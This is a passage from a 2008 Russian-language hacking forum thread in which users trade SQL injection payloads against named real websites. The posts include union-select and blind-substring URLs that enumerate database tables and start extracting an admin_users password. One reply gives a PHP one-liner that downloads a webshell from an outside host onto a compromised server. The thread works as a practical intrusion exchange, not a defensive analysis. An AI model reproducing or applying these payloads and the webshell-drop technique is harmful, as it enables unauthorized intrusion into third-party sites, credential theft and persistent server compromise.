ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4401  
Старый 29.12.2008, 22:26
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

а вот ещё!
http://www.petarda.ru/default.asp?tmpl=search_list&info=gfd&price_from=& price_to=&orderby=price&ordertype=1%27

пишет: "ошибка БД"

уязвимость?
 
Ответить с цитированием

  #4402  
Старый 29.12.2008, 22:31
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

F4R, нет.
 
Ответить с цитированием

  #4403  
Старый 29.12.2008, 23:02
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от sabe  
http://www.xyligan.ru/users/eugenie/blog/blog.php?readpost=4233','')
иьект?
https://forum.antichat.ru/showpost.php?p=307103&postcount=1

Цитата:
Сообщение от F4R  
а вот ещё!
http://www.petarda.ru/default.asp?tmpl=search_list&info=gfd&price_from=& price_to=&orderby=price&ordertype=1%27

пишет: "ошибка БД"

уязвимость?
вообще говоря сортировка меняется
Цитата:
_petarda.ru/default.asp?tmpl=search_list&info=%ED%EE%E2%FB%E9& price_from=0&price_to=9999&orderby=price*1
Цитата:
_petarda.ru/default.asp?tmpl=search_list&info=%ED%EE%E2%FB%E9& price_from=0&price_to=9999&orderby=price*-1
но заюзать багу как говорит Никита Литвинков 50/50 (либо получится, либо нет)
 
Ответить с цитированием

  #4404  
Старый 29.12.2008, 23:04
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

l1ght
и что? как разкрутить http://www.xyligan.ru/users/eugenie/blog/blog.php?readpost=4233','') там просто нужно закоментировать остальное и составить превельное началало запроса..

Последний раз редактировалось sabe; 30.12.2008 в 06:19..
 
Ответить с цитированием

  #4405  
Старый 29.12.2008, 23:24
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

2 Thrasher88
Это PostgreSQL, идем сюда и читаем http://forum.antichat.ru/showthread.php?t=35599
Пробуем
http://www.myprof.ru/prof.php?id=1+union+select+null,null,null--
получилось.
Принтабельные поля по статье найти не удалось, хз почему, но пробуем втупую через имя колонки
/prof.php?id=-1+union+select+TABLE_NAME,null,null+from+informati on_schema.tables--
и вуаля таблички есть
Дальше сам, я не рыл
 
Ответить с цитированием

  #4406  
Старый 30.12.2008, 02:50
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Цитата:
http://research.sun.com/people/mybio.php?uid=-28941+or+1=1
явахек?))

Цитата:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+union+select+1,2,3,4,5 ,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+information _schema.tables/*
логический вывод 5 ветка, что поделать?

Цитата:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+union+select+1+limit+1 ,1/*
не подбор

Последний раз редактировалось sabe; 30.12.2008 в 06:04..
 
Ответить с цитированием

  #4407  
Старый 30.12.2008, 12:19
Napas
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871

Репутация: 16
По умолчанию

проблема такая,есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл? инклуде не работает
и еще,когда записываешь в файл прибавляется такая фигня -

202 537 9.pdf 22042 application/pdf 1
1 2 202\ 537\ 9.pdf\ 22042\ application/pdf\ 1\
[сюда_вставляется_все_что_я_ аписываю_через_скуль]\ 2\ 3\ 4\ 5\ 6\
4 5 6
 
Ответить с цитированием

  #4408  
Старый 30.12.2008, 12:58
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Napas
Цитата:
есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл?
создавай .php файл:
Цитата:
<?php copy("http://site.com/shell.txt","./papka/na/servere/shell.php"); ?>
выполняй его, и shell.php будет твой шелл

Последний раз редактировалось aka PSIH; 30.12.2008 в 13:01..
 
Ответить с цитированием

  #4409  
Старый 30.12.2008, 13:05
Napas
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871

Репутация: 16
По умолчанию

aka PSIH
не катит (
Warning: copy(D:/Web/cms/xek.php) [function.copy]: failed to open stream: Permission denied in D:\Web\cms\jj.php on line 2
можно ли еще что-нибудь сделать в такой ситуации?

Последний раз редактировалось Napas; 30.12.2008 в 14:20..
 
Ответить с цитированием

  #4410  
Старый 30.12.2008, 13:24
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

sabe
Что вы так боитесь подзапросы, один раз разобраться, и всё станет понятно в дальнейшем
Вот пример(точнее один из вариантов), всё просто
Подбираем таблицу:
Цитата:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+AND+lower(substring((s elect+table_name+from+information_schema.tables+li mit+17,1),1,11))='admin_users'
Далее, вывод значения:
Цитата:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+AND+lower(substring((s elect+password+from+admin_users+limit+0,1),1,2))=' mu'
Это незаконченный вывод
Добивать не стал. кому нужно разберутся )

Разумеется скриптами всё будет гораздо быстрее чем вручную
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ